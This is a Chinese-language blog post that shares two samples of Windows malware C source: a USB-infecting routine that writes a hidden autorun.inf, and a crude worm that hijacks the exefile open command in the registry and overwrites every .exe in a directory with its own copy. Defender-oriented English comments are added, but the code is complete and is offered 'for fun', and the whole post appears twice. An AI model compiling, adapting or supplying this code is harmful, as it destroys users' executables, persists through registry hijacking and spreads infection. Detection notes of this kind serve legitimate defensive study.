下面是最常见的感染U盘的代码(向盘符根目录写入带隐藏、系统属性的 autorun.inf),很好理解;代码来自网上,没有改。
/*
 * cfile - write an autorun.inf file under the path prefix given in `drivers`.
 *
 * Analyst notes, limited to what this listing shows:
 *  - The target path is `drivers` immediately followed by "autorun.inf"
 *    (presumably `drivers` is a drive root with a trailing separator;
 *    confirm against the caller, which is not on this page).
 *  - CREATE_ALWAYS replaces any autorun.inf already at that path.
 *  - The file is marked HIDDEN|SYSTEM at creation and again afterwards, so it
 *    is not listed by Explorer under default view settings.
 *  - The [AutoRun] text names "notepad.exe" inside a "Recycled" folder as the
 *    open / shell-open command. This function does not create that file.
 *  - No API return value is checked.
 *
 * Defender view: a hidden+system autorun.inf in the root of removable media
 * whose open/shell commands point into a Recycled folder is the artifact to
 * look for. Windows 7 and later ignore autorun.inf launch commands on USB
 * mass-storage devices; on older systems the NoDriveTypeAutoRun policy
 * disables AutoRun for removable drives.
 *
 * NOTE(review): the "/n" and "//" sequences in the literals below look altered
 * by the page's text extraction; they are kept byte-for-byte here.
 */
void cfile(LPCTSTR drivers)
{
HANDLE hCFN;
char ch1[MAX_PATH];
DWORD filesize1 , wsize;
/* Build "<drivers>autorun.inf" as the output path. */
wsprintf(ch1,"%sautorun.inf",drivers);
/* Text written to the file: an [AutoRun] section whose open and shell\open
   entries reference Recycled/notepad.exe. */
char autorunc[]="[AutoRun] /n open=Recycled//notepad.exe /n ` /n shell//open=打开(&O)/nshell//open//Command=Recycled//notepad.exe /n shell//open//Default=1";
/* sizeof counts the terminating NUL; it is subtracted again at WriteFile. */
filesize1=sizeof(autorunc);
/* Share mode 0 = exclusive access; CREATE_ALWAYS truncates an existing file.
   The returned handle is not compared with INVALID_HANDLE_VALUE. */
hCFN=CreateFile(ch1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
/* Writes the text without its NUL terminator; wsize is never inspected. */
WriteFile(hCFN,autorunc,filesize1-1,&wsize,NULL);
/* Re-applies HIDDEN|SYSTEM on the path. */
SetFileAttributes(ch1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CloseHandle(hCFN);
}
还有这一段代码很有意思,作者貌似是一个俄罗斯的新手,你可以在29A的论坛上找到这段代码。它基本上说明了如何实现自启动(改写 exefile 的打开命令),但是没有做基本的除错,也没有做传播;另外他用的是暴力覆盖的方法,被覆盖的原文件无法恢复。。。类似前一阵子的小浩,编译了后不要随便运行。。。否则后果自负。
#include "windows.h"
#include "string.h"
/*
 * main - sample that (1) copies its own image into the Windows directory,
 * (2) writes the path of that copy plus " %1" as the default value of the
 * HKEY_CLASSES_ROOT subkey held in `subkey`, and (3) overwrites executables
 * with its own image.
 *
 * Analyst notes, limited to what this listing shows:
 *  - Every CopyFileA call passes bFailIfExists = 0, so the destination is
 *    replaced. Target files are overwritten, not modified in place; the
 *    original content is gone and can only be restored from backup.
 *  - With an argument (argc > 1) the file named by argv[1] is overwritten and
 *    the process exits; without one, every "*.exe" match in the current
 *    directory is overwritten.
 *  - No API return value is checked anywhere in the function.
 *
 * Defender view: the observable artifacts are a "supa.exe" in the Windows
 * directory, a changed default value under the exefile open-command key (the
 * stock Windows value is `"%1" %*`), and many .exe files in one directory
 * sharing the same size and hash. Monitoring writes to that registry value
 * and comparing it with the stock value covers the persistence step.
 *
 * NOTE(review): the "//" separators in the literals below look altered by the
 * page's text extraction; they are kept byte-for-byte here.
 */
int main(int argc, char *fuck[])
{
char windir[200];
char dropper[10]="//supa.exe";
char param1[4]=" %1";
char subkey[40]="exefile//shell//open//command";
HANDLE find_handle;
WIN32_FIND_DATA ff;
/* Never referenced in the visible code; if the string survives compilation it
   can serve as a static signature for the binary. */
char msg1[200]="[ Worm Win32 -+w32.exe.IRC+- For The Mather Russia and Zaicev Dimon ]";
/* Fetch the Windows directory (size passed as 100 although the buffer is 200). */
GetWindowsDirectoryA(windir,100);
/* windir now names the drop location: <Windows directory> + dropper. */
lstrcatA(windir,dropper);
/* Copy the running image (argv[0]) to the drop location, replacing any file there. */
CopyFileA(fuck[0],windir,0);
/* Append " %1" so the string has the form of a shell command line. */
lstrcatA(windir,param1);
/* Third argument is 0, so no key handle is received from this call. */
RegOpenKeyA(HKEY_CLASSES_ROOT,subkey,0);
/* Sets the default (unnamed) value of `subkey` under HKCR to the string in
   windir. Presumably the intent is that opening any .exe launches the dropped
   copy with the requested file as its argument - the argc > 1 branch below
   matches that reading. */
RegSetValueA(HKEY_CLASSES_ROOT,subkey,REG_SZ,windir,sizeof(windir));
/* Called on the predefined root key, not on a handle opened above. */
RegCloseKey(HKEY_CLASSES_ROOT);
if (argc>1)
{
/* Invoked with an argument: overwrite the file named by argv[1] with this
   image, then exit. The file named by argv[1] is not executed. */
CopyFileA(fuck[0],fuck[1],0);
exit(0);
}
/* No argument: enumerate "*.exe" in the current directory. The handle is not
   compared with INVALID_HANDLE_VALUE before `ff` is used. */
find_handle=FindFirstFileA("*.exe",&ff);
while (1)
{
/* Overwrite each match with this program's own image. */
CopyFileA(fuck[0],ff.cFileName,0);
if (!FindNextFileA(find_handle,&ff)) break;
}
FindClose(find_handle);
return (0);
}
都没啥技术含量,权当一乐。
/*
 * cfile - write an autorun.inf file under the path prefix given in `drivers`.
 *
 * Analyst notes, limited to what this listing shows:
 *  - The target path is `drivers` immediately followed by "autorun.inf"
 *    (presumably `drivers` is a drive root with a trailing separator;
 *    confirm against the caller, which is not on this page).
 *  - CREATE_ALWAYS replaces any autorun.inf already at that path.
 *  - The file is marked HIDDEN|SYSTEM at creation and again afterwards, so it
 *    is not listed by Explorer under default view settings.
 *  - The [AutoRun] text names "notepad.exe" inside a "Recycled" folder as the
 *    open / shell-open command. This function does not create that file.
 *  - No API return value is checked.
 *
 * Defender view: a hidden+system autorun.inf in the root of removable media
 * whose open/shell commands point into a Recycled folder is the artifact to
 * look for. Windows 7 and later ignore autorun.inf launch commands on USB
 * mass-storage devices; on older systems the NoDriveTypeAutoRun policy
 * disables AutoRun for removable drives.
 *
 * NOTE(review): the "/n" and "//" sequences in the literals below look altered
 * by the page's text extraction; they are kept byte-for-byte here.
 */
void cfile(LPCTSTR drivers)
{
HANDLE hCFN;
char ch1[MAX_PATH];
DWORD filesize1 , wsize;
/* Build "<drivers>autorun.inf" as the output path. */
wsprintf(ch1,"%sautorun.inf",drivers);
/* Text written to the file: an [AutoRun] section whose open and shell\open
   entries reference Recycled/notepad.exe. */
char autorunc[]="[AutoRun] /n open=Recycled//notepad.exe /n ` /n shell//open=打开(&O)/nshell//open//Command=Recycled//notepad.exe /n shell//open//Default=1";
/* sizeof counts the terminating NUL; it is subtracted again at WriteFile. */
filesize1=sizeof(autorunc);
/* Share mode 0 = exclusive access; CREATE_ALWAYS truncates an existing file.
   The returned handle is not compared with INVALID_HANDLE_VALUE. */
hCFN=CreateFile(ch1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
/* Writes the text without its NUL terminator; wsize is never inspected. */
WriteFile(hCFN,autorunc,filesize1-1,&wsize,NULL);
/* Re-applies HIDDEN|SYSTEM on the path. */
SetFileAttributes(ch1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CloseHandle(hCFN);
}
还有这一段代码很有意思,作者貌似是一个俄罗斯的新手,你可以在29A的论坛上找到这段代码。它基本上说明了如何实现自启动(改写 exefile 的打开命令),但是没有做基本的除错,也没有做传播;另外他用的是暴力覆盖的方法,被覆盖的原文件无法恢复。。。类似前一阵子的小浩,编译了后不要随便运行。。。否则后果自负。
#include "windows.h"
#include "string.h"
/*
 * main - sample that (1) copies its own image into the Windows directory,
 * (2) writes the path of that copy plus " %1" as the default value of the
 * HKEY_CLASSES_ROOT subkey held in `subkey`, and (3) overwrites executables
 * with its own image.
 *
 * Analyst notes, limited to what this listing shows:
 *  - Every CopyFileA call passes bFailIfExists = 0, so the destination is
 *    replaced. Target files are overwritten, not modified in place; the
 *    original content is gone and can only be restored from backup.
 *  - With an argument (argc > 1) the file named by argv[1] is overwritten and
 *    the process exits; without one, every "*.exe" match in the current
 *    directory is overwritten.
 *  - No API return value is checked anywhere in the function.
 *
 * Defender view: the observable artifacts are a "supa.exe" in the Windows
 * directory, a changed default value under the exefile open-command key (the
 * stock Windows value is `"%1" %*`), and many .exe files in one directory
 * sharing the same size and hash. Monitoring writes to that registry value
 * and comparing it with the stock value covers the persistence step.
 *
 * NOTE(review): the "//" separators in the literals below look altered by the
 * page's text extraction; they are kept byte-for-byte here.
 */
int main(int argc, char *fuck[])
{
char windir[200];
char dropper[10]="//supa.exe";
char param1[4]=" %1";
char subkey[40]="exefile//shell//open//command";
HANDLE find_handle;
WIN32_FIND_DATA ff;
/* Never referenced in the visible code; if the string survives compilation it
   can serve as a static signature for the binary. */
char msg1[200]="[ Worm Win32 -+w32.exe.IRC+- For The Mather Russia and Zaicev Dimon ]";
/* Fetch the Windows directory (size passed as 100 although the buffer is 200). */
GetWindowsDirectoryA(windir,100);
/* windir now names the drop location: <Windows directory> + dropper. */
lstrcatA(windir,dropper);
/* Copy the running image (argv[0]) to the drop location, replacing any file there. */
CopyFileA(fuck[0],windir,0);
/* Append " %1" so the string has the form of a shell command line. */
lstrcatA(windir,param1);
/* Third argument is 0, so no key handle is received from this call. */
RegOpenKeyA(HKEY_CLASSES_ROOT,subkey,0);
/* Sets the default (unnamed) value of `subkey` under HKCR to the string in
   windir. Presumably the intent is that opening any .exe launches the dropped
   copy with the requested file as its argument - the argc > 1 branch below
   matches that reading. */
RegSetValueA(HKEY_CLASSES_ROOT,subkey,REG_SZ,windir,sizeof(windir));
/* Called on the predefined root key, not on a handle opened above. */
RegCloseKey(HKEY_CLASSES_ROOT);
if (argc>1)
{
/* Invoked with an argument: overwrite the file named by argv[1] with this
   image, then exit. The file named by argv[1] is not executed. */
CopyFileA(fuck[0],fuck[1],0);
exit(0);
}
/* No argument: enumerate "*.exe" in the current directory. The handle is not
   compared with INVALID_HANDLE_VALUE before `ff` is used. */
find_handle=FindFirstFileA("*.exe",&ff);
while (1)
{
/* Overwrite each match with this program's own image. */
CopyFileA(fuck[0],ff.cFileName,0);
if (!FindNextFileA(find_handle,&ff)) break;
}
FindClose(find_handle);
return (0);
}